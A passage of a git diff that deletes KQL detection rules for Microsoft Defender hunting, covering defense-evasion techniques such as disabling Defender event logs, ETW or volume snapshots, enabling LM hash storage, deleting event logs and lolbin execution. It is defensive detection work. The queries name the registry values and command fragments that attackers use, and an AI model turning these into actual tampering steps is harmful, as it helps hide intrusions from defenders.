-// Date: 2020/06/19
-// Level: high
-// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ")
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_Volume_Snapshots.kql b/Defense Evasion/Disabled_Volume_Snapshots.kql
deleted file mode 100644
index 4531559c..00000000
--- a/Defense Evasion/Disabled_Volume_Snapshots.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/28
-// Level: high
-// Description: Detects commands that temporarily turn off Volume Snapshots
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled"
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql b/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql
deleted file mode 100644
index a8f2a083..00000000
--- a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/04
-// Level: high
-// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled"
\ No newline at end of file
diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql
deleted file mode 100644
index 9f443b1a..00000000
--- a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql
deleted file mode 100644
index a628f79d..00000000
--- a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
-Initial baselining of the allowed extension list is required.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt"))
\ No newline at end of file
diff --git a/Defense Evasion/Dism_Remove_Online_Package.kql b/Defense Evasion/Dism_Remove_Online_Package.kql
deleted file mode 100644
index 78d6b348..00000000
--- a/Defense Evasion/Dism_Remove_Online_Package.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature"))
\ No newline at end of file
diff --git a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql b/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql
deleted file mode 100644
index 62698c93..00000000
--- a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/04/02
-// Level: medium
-// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
-This technique is abused by several malware families to hide their files from normal users.
-
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden")
\ No newline at end of file
diff --git a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql b/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql
deleted file mode 100644
index cf74575e..00000000
--- a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/24
-// Level: medium
-// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql b/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql
deleted file mode 100644
index e3208d89..00000000
--- a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/27
-// Level: high
-// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
diff --git a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
deleted file mode 100644
index 4a2e8091..00000000
--- a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: bartblaze
-// Date: 2020/07/13
-// Level: medium
-// Description: Detects dllhost initiating a network connection to a non-local IP address.
-Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
-An initial baseline is recommended before deployment.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql b/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql
deleted file mode 100644
index 8c857cd9..00000000
--- a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: medium
-// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\"
\ No newline at end of file
diff --git a/Defense Evasion/DumpMinitool_Execution.kql b/Defense Evasion/DumpMinitool_Execution.kql
deleted file mode 100644
index f7f7fd6a..00000000
--- a/Defense Evasion/DumpMinitool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/06
-// Level: medium
-// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/DumpStack.log_Defender_Evasion.kql b/Defense Evasion/DumpStack.log_Defender_Evasion.kql
deleted file mode 100644
index a0a25999..00000000
--- a/Defense Evasion/DumpStack.log_Defender_Evasion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/06
-// Level: critical
-// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log"
\ No newline at end of file
diff --git a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql b/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql
deleted file mode 100644
index ce4a9118..00000000
--- a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/08/24
-// Level: medium
-// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql b/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql
deleted file mode 100644
index 030bd66d..00000000
--- a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: low
-// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
-Certain processes are not typically observed compiling C# code, but can do so without touching disk.
-This can be used to unpack a payload for execution
-
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceFileEvents
-| where FolderPath endswith ".cmdline"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql b/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql
deleted file mode 100644
index 8766923b..00000000
--- a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/09
-// Level: low
-// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql b/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql
deleted file mode 100644
index ec62c30a..00000000
--- a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/09
-// Level: low
-// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562
-DeviceRegistryEvents
-| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql b/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql
deleted file mode 100644
index 148555ce..00000000
--- a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: high
-// Description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags"
\ No newline at end of file
diff --git a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql b/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql
deleted file mode 100644
index ee7f0473..00000000
--- a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: D3F7A5105
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
-This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
-Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceFileEvents
-| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Enable_LM_Hash_Storage.kql b/Defense Evasion/Enable_LM_Hash_Storage.kql
deleted file mode 100644
index 2ae9a54e..00000000
--- a/Defense Evasion/Enable_LM_Hash_Storage.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql b/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql
deleted file mode 100644
index 3d5fa187..00000000
--- a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql b/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql
deleted file mode 100644
index d6abdc89..00000000
--- a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql b/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql
deleted file mode 100644
index 771adbd0..00000000
--- a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/03
-// Level: medium
-// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"
\ No newline at end of file
diff --git a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql b/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Defense Evasion/EventLog_EVTX_File_Deleted.kql b/Defense Evasion/EventLog_EVTX_File_Deleted.kql
deleted file mode 100644
index 2e9420ac..00000000
--- a/Defense Evasion/EventLog_EVTX_File_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql b/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql
deleted file mode 100644
index a124be21..00000000
--- a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/26
-// Level: high
-// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Code_with_Pester.bat.kql b/Defense Evasion/Execute_Code_with_Pester.bat.kql
deleted file mode 100644
index 0676e78a..00000000
--- a/Defense Evasion/Execute_Code_with_Pester.bat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql b/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql
deleted file mode 100644
index 7a116895..00000000
--- a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql b/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql
deleted file mode 100644
index b557d443..00000000
--- a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects file execution using the msdeploy.exe lolbin
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql b/Defense Evasion/Execute_From_Alternate_Data_Streams.kql
deleted file mode 100644
index 39de86ed..00000000
--- a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/09/01
-// Level: medium
-// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > "))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql b/Defense Evasion/Execute_MSDT_Via_Answer_File.kql
deleted file mode 100644
index 3ce729d9..00000000
--- a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
deleted file mode 100644
index b385a85e..00000000
--- a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql b/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql
deleted file mode 100644
index 03ab5746..00000000
--- a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020/10/13
-// Level: high
-// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
